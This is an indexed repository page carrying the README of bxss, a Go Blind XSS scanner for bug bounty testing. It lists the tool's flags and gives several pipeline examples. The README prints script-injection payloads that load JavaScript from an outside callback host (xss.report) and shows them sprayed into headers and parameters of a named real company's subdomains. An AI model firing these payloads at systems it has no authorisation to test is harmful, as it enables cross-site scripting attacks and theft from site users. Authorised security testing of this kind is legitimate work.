MCPcopy Index your code
hub / github.com/ethicalhackingplayground/bxss

github.com/ethicalhackingplayground/bxss @v0.0.3

Chat with this repo
repository ↗ · DeepWiki ↗ · release v0.0.3 ↗ · + Follow
19 symbols 47 edges 5 files 10 documented · 53%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

Bxss Bxss - Blind XSS Scanner

Version License Go Report Card Go Reference


🚀 Description

Bxss is a high-performance Blind XSS scanner that automates the detection of blind XSS vulnerabilities in web applications.


✨ Features

  • Injects Blind XSS payloads into custom headers & parameters
  • Supports multiple HTTP methods (PUT, POST, GET, OPTIONS)
  • High-speed scanning with concurrency support
  • Easily chainable with other tools
  • Simple installation and usage

🧪 Experimental Features

  • Trace mode (experimental)

📦 Installation

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ Arguments

Argument Description Default
-a Append the payload to the parameter false
-c int Set the concurrency level 30
-H string Set a custom header ""
-hf string Path to file with headers ""
-p string The blind XSS payload ""
-pf string Path to file with payloads ""
-t Test parameters for blind XSS false
-X string HTTP method to use ""
-v Enable debug mode false
-rl float Rate limit (requests per second) 0
-f Follow redirects false
-l Enable Trace Mode (experimental) false
---

🎬 Demonstration

Demo


📝 What is Trace mode?

Trace mode is an experimental feature that allows you to track where the BlindXSS got triggered, some third party BlindXSS platforms such as https://xss.report/ allows you to specify custom parameters in you're payloads, this allows you to track where the BlindXSS got triggered, for example if you specify the parameter url=https://somehost.com in your payload, the tool will use the payload

'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

for testing and upon a trigger you will be able to inspect the DOM and see what host the BlindXSS got triggered from.

Xss Report

Make sure when assigning custom parameters in you're dashboard that you assign url={LINK} so bxss can automatically replace {LINK} with the actual URL.

🔥 Usage Examples

Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Append To Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Both Headers & Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For Header

subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Custom Headers & Parameters

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks With Dorki

curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Custom Headers & Parameters With Rate Limit

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

For advanced dorking and vulnerability exploration, check out Dorki and sign up today!


☕ Support the Project

If you get a bounty using this tool, consider supporting by buying me a coffee!

Buy Me A Coffee

Extension points exported contracts — how you extend this code

ScannerInterface (Interface)
(no doc) [1 implementers]
v2/pkg/scan/scan.go

Core symbols most depended-on inside this repo

Scan
called by 4
v2/pkg/scan/scan.go
MakeRequest
called by 3
v2/pkg/scan/scan.go
ReadLinesFromFile
called by 2
v2/pkg/payloads/payloads.go
ProcessPayloadsAndHeaders
called by 1
v2/pkg/payloads/payloads.go
EnsureProtocol
called by 1
v2/pkg/payloads/payloads.go
ValidateArgs
called by 1
v2/pkg/arguments/arguments.go
Setheaders
called by 1
v2/pkg/scan/scan.go
DebugRequest
called by 1
v2/pkg/scan/scan.go

Shape

Method 10
Function 4
Struct 4
Interface 1

Languages

Go100%

Modules by API surface

v2/pkg/scan/scan.go10 symbols
v2/pkg/payloads/payloads.go5 symbols
v2/pkg/arguments/arguments.go3 symbols
v2/cmd/bxss/main.go1 symbols

For agents

$ claude mcp add bxss \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact